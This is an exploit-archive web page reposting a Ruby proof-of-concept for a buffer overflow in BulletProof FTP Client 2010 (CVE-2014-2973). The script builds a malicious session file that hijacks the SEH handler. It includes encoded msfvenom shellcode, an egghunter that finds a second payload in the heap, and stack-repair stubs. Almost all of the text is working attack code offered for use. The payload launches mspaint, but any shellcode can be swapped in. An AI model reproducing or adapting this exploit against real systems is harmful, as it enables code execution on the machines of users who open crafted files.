首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BulletProof FTP Client 2010 Buffer Overflow
来源:mind1355[at]gmail.com 作者:Ramli 发布时间:2014-12-10  
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass buffer size limitation for bigger payload. Allocate 2nd
# shellcode in heap and copy back to stack. This exploit use egghunter
# to locate 2nd shellcode in heap and copy to stack. Load the exploit file
# and click connect to trigger the exploit.

# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 500

# ./msfvenom -p windows/exec CMD=mspaint -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
heap_sc =
"w00tw00t" +
"\xda\xc4\xbf\xd7\xec\x92\xb5\xd9\x74\x24\xf4\x5d\x33\xc9" +
"\xb1\x32\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2\x22\x10" +
"\x7a\x3c\xcc\xe9\x7b\x5f\x45\x0c\x4a\x4d\x31\x44\xff\x41" +
"\x32\x08\x0c\x29\x16\xb9\x87\x5f\xbe\xce\x20\xd5\x98\xe1" +
"\xb1\xdb\x24\xad\x72\x7d\xd8\xac\xa6\x5d\xe1\x7e\xbb\x9c" +
"\x26\x62\x34\xcc\xff\xe8\xe7\xe1\x74\xac\x3b\x03\x5a\xba" +
"\x04\x7b\xdf\x7d\xf0\x31\xde\xad\xa9\x4e\xa8\x55\xc1\x09" +
"\x08\x67\x06\x4a\x74\x2e\x23\xb9\x0f\xb1\xe5\xf3\xf0\x83" +
"\xc9\x58\xcf\x2b\xc4\xa1\x08\x8b\x37\xd4\x62\xef\xca\xef" +
"\xb1\x8d\x10\x65\x27\x35\xd2\xdd\x83\xc7\x37\xbb\x40\xcb" +
"\xfc\xcf\x0e\xc8\x03\x03\x25\xf4\x88\xa2\xe9\x7c\xca\x80" +
"\x2d\x24\x88\xa9\x74\x80\x7f\xd5\x66\x6c\xdf\x73\xed\x9f" +
"\x34\x05\xac\xf5\xcb\x87\xcb\xb3\xcc\x97\xd3\x93\xa4\xa6" +
"\x58\x7c\xb2\x36\x8b\x38\x4c\x7d\x91\x69\xc5\xd8\x40\x28" +
"\x88\xda\xbf\x6f\xb5\x58\x35\x10\x42\x40\x3c\x15\x0e\xc6" +
"\xad\x67\x1f\xa3\xd1\xd4\x20\xe6\xbc\xa9\xae\x68\x57\x20" +
"\x3b\x6b"

# badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2'
# find 1st heap address
heap_addr =
"\x50" + # push eax
"\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh
"\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777f = 0x30 (TEB)
"\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx]
"\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh = 0x90 (PEB)
"\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx]
"\x8b\x1b" #  mov ebx,dword ptr [ebx]

egghunter =
"\x8b\xd3" + # mov edx,ebx
"\xeb\x05" + # jmp ___FCKpd___00x5 (#2)
"\x66\x81\xca\xff\x0f" + # or dx, 0xfff (#1)
"\x42" + # inc edx (#2)
"\x52" + # push edx
"\x6a\x02" + # push 2
"\x58" + # pop eax
"\xcd\x2e" + # int 0x2e
"\x3c\x05" + # cmp al,5
"\x5a" + # pop edx
"\x74\xef" + # je $-0xf (#1)
"\xb8\x77\x30\x30\x74" + # mov eax,0x74303077 (our tag 'w00t')
"\x8b\xfa" + # mov edi,edx
"\xaf" + # scasd eax, dword ptr es:[edi]
"\x75\xea" + # jne $-0x14 (#2)
"\xaf" + # scasd eax, dword ptr es:[edi]
"\x75\xe7" + # jne $-0x17 (#2)

copy_sc =
"\x58" + # pop eax
"\x05\x54\xf2\xff\xff" + # add eax,-3500
"\x89\xfe" + # mov esi,edi
"\x89\xc7" + # mov edi,eax
"\xb9\x61\x78\x77\x77" + # mov ecx,0x77777861
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
"\xf2\xa4" + # rep movsb
"\xff\xe0" # jmp eax

stack_sc = heap_addr + egghunter + copy_sc

# GetPC
buff[1,2] = "\xd9\xeb"                      # fldpi
buff[3,5] = "\x9b\xd9\x74\x24\xf4"          # fstenv [esp-0xc]
buff[8,1] = "\x58" # pop eax                # pop esp into eax

# FixRet stub 
buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45"  # (1)
buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp
buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr

buff[30,stack_sc.size] = stack_sc

# repair stack
buff[12,4] = buff[seh-24,4]                 # replace with original sc (1)
buff[19,4] = buff[seh-4,4]                  # replace with original sc (2)
buff[26,4] = buff[seh,4]                    # replace with original sc (3)

buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166
buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null

bps =
"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" +
"\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" +
"\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" +
"\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" +
"\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" +
"\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" +
"\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" +
buff + "\x0D\x0A\x61\x6E" +
"\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" +
"\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" +
"\x0A"

File.open(filename,"wb") do |fp|
  fp.write(bps)
  puts "Exploit file: #{filename} size: #{bps.size}"
  fp.close
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Flat Calendar 1.1 HTML Injecti
·VFU 4.10-1.1 - Buffer Overflow
·Tiny Server 1.1.9 - Arbitrary
·Advantech AdamView 4.30.003 -
·Windows Kerberos - Elevation o
·WordPress WP Symposium 14.11 S
·Microsoft Windows Win32k.sys -
·Tuleap PHP Unserialize Code Ex
·IBM Endpoint Manager For Mobil
·Wordpress Download Manager 2.7
·IPUX CL5452/CL5132 IP Camera S
·tnftp - clientside BSD Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved